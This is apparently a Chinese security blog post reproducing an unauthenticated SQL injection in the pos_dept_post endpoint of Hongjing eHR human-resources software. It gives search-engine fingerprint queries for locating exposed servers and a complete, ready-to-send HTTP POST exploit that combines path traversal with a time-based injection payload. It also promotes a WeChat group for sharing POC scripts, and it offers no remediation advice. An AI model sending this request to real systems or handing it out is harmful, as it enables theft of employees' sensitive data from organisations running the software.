【漏洞复现】宏景eHR pos_dept_post SQL注入漏洞

0x01 产品简介

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化、协同化、流程化、战略化需求的软件。

0x02 漏洞概述

宏景eHR pos_dept_post 接囗处存在SQL注入漏洞,未经过身份认证的远程攻击者利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

0x03 搜索引擎

body="<div class=\"hj-hy-all-one-logo\"" || title="人力资源信息管理系统" || body="/general/sys/hjaxmanage.js"

在这里插入图片描述

0x04 漏洞复现

POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
x-auth-token: d9eaeacd5de1008fd43f737c853dcbcb
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
usertable=h00&i9999=1';WAITFOR DELAY '0:0:5'--+

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

相关推荐

  1. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-06-11 03:42:03       22 阅读
  2. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-06-11 03:42:03       13 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-06-11 03:42:03       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-11 03:42:03       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-11 03:42:03       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-11 03:42:03       20 阅读

热门阅读

  1. Centos7.9部署单节点K8S环境

    2024-06-11 03:42:03       8 阅读
  2. leetcode 40. 组合总和 II

    2024-06-11 03:42:03       11 阅读
  3. Cordova WebView重定向到网站

    2024-06-11 03:42:03       10 阅读
  4. 重写setter方法要小心递归调用

    2024-06-11 03:42:03       5 阅读
  5. 代码随想录打卡第一天(补)

    2024-06-11 03:42:03       7 阅读
  6. web3规则改变者:Linea的厉害之处

    2024-06-11 03:42:03       8 阅读
  7. 什么是 prop drilling,如何避免?

    2024-06-11 03:42:03       10 阅读
  8. 【CSP】202312-1 仓库规划

    2024-06-11 03:42:03       10 阅读
  9. testbench仿真文件编写规则

    2024-06-11 03:42:03       8 阅读
  10. 头歌初识redis答案

    2024-06-11 03:42:03       8 阅读
  11. 机器人--矩阵运算

    2024-06-11 03:42:03       6 阅读